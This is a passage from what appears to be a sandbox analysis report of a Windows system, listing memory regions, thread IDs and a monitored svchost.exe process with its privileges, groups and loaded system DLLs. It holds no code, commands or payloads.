"private_0x000007fffffaa000" filename = "" Region: id = 1536 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1537 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1538 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1539 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1540 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1541 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1542 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1543 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1544 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1545 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2149 start_va = 0x1600000 end_va = 0x167ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 2150 start_va = 0x2000000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2200 start_va = 0x25f0000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Thread: id = 49 os_tid = 0xe50 Thread: id = 50 os_tid = 0xdc0 Thread: id = 51 os_tid = 0xdbc Thread: id = 52 os_tid = 0xc54 Thread: id = 53 os_tid = 0x878 Thread: id = 54 os_tid = 0x874 Thread: id = 55 os_tid = 0x868 Thread: id = 56 os_tid = 0x38c Thread: id = 57 os_tid = 0x230 Thread: id = 58 os_tid = 0x764 Thread: id = 59 os_tid = 0x43c Thread: id = 60 os_tid = 0x450 Thread: id = 61 os_tid = 0x3e8 Thread: id = 62 os_tid = 0x5d0 Thread: id = 63 os_tid = 0x478 Thread: id = 64 os_tid = 0x444 Thread: id = 65 os_tid = 0x440 Thread: id = 66 os_tid = 0x76c Thread: id = 67 os_tid = 0x748 Thread: id = 68 os_tid = 0x730 Thread: id = 69 os_tid = 0x724 Thread: id = 70 os_tid = 0x720 Thread: id = 71 os_tid = 0x718 Thread: id = 72 os_tid = 0x6fc Thread: id = 73 os_tid = 0x6e8 Thread: id = 74 os_tid = 0x6e0 Thread: id = 75 os_tid = 0x6c0 Thread: id = 76 os_tid = 0x6ac Thread: id = 77 os_tid = 0x694 Thread: id = 78 os_tid = 0x4b0 Thread: id = 79 os_tid = 0x4ac Thread: id = 80 os_tid = 0x49c Thread: id = 81 os_tid = 0x498 Thread: id = 82 os_tid = 0x48c Thread: id = 83 os_tid = 0x1bc Thread: id = 84 os_tid = 0x120 Thread: id = 85 os_tid = 0x3f0 Thread: id = 86 os_tid = 0x3e4 Thread: id = 87 os_tid = 0x3d8 Thread: id = 88 os_tid = 0x37c Thread: id = 89 os_tid = 0x36c Thread: id = 90 os_tid = 0x364 Thread: id = 119 os_tid = 0xeb0 Thread: id = 120 os_tid = 0xeb8 Thread: id = 124 os_tid = 0xef8 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xdb4d000" os_pid = "0x2c0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7] Region: id = 1579 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1580 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1581 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1582 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1583 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1584 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1585 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1586 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1587 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1588 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1589 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1590 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1591 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1592 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1593 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1594 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1595 start_va = 0x7a0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1596 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1597 start_va = 0x840000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1598 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1599 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1600 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1601 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1602 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1603 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1604 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1605 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1606 start_va = 0xd50000 end_va = 0xdb1fff monitored = 0 entry_point = 0xd608d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1607 start_va = 0xdc0000 end_va = 0xdc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1608 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1609 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 1610 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1611 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1612 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 1613 start_va = 0xe20000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1614 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 1615 start_va = 0xf30000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1616 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1617 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1618 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1619 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 1620 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 1621 start_va = 0x13e0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 1622 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 1623 start_va = 0x1550000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1624 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1625 start_va = 0x18f0000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 1626 start_va = 0x1990000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 1627 start_va = 0x1a20000 end_va = 0x1a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 1628 start_va = 0x1b30000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 1629 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 1630 start_va = 0x1cf0000 end_va = 0x20f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 1631 start_va = 0x2100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1632 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1633 start_va = 0x2630000 end_va = 0x26affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1634 start_va = 0x2730000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1635 start_va = 0x2840000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1636 start_va = 0x2950000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 1637 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 1638 start_va = 0x2ac0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 1639 start_va = 0x2bc0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1640 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1641 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1642 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1643 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1644 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1645 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1646 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1647 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1648 start_va = 0xff430000 end_va = 0xff491fff monitored = 0 entry_point = 0xff4408d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1649 start_va = 0x7fef0f40000 end_va = 0x7fef0fedfff monitored = 0 entry_point = 0x7fef0f44104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1650 start_va = 0x7fef0ff0000 end_va = 0x7fef1114fff monitored = 0 entry_point = 0x7fef1041570 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1651 start_va = 0x7fef1120000 end_va = 0x7fef113bfff monitored = 0 entry_point = 0x7fef1121060 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1652 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1653 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1654 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1655 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1656 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1657 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1658 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1659 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1660 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1661 start_va = 0x7fef91e0000 end_va = 0x7fef921afff monitored = 0 entry_point = 0x7fef91e4520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1662 start_va = 0x7fef9220000 end_va = 0x7fef9270fff monitored = 0 entry_point = 0x7fef922f6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1663 start_va = 0x7fef9290000 end_va = 0x7fef9297fff monitored = 0 entry_point = 0x7fef929284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1664 start_va = 0x7fef92a0000 end_va = 0x7fef92a9fff monitored = 0 entry_point = 0x7fef92a1adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1665 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1666 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1667 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1668 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1669 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1670 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1671 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1672 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1673 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1674 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1675 start_va = 0x7fefc770000 end_va = 0x7fefc905fff monitored = 0 entry_point = 0x7fefc7778e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1676 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1677 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1678 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1679 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1680 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1681 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1682 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1683 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1684 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1685 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1686 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1687 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1688 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1689 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1690 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1691 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1692 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1693 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1694 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1695 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1696 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1697 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1698 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1699 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = 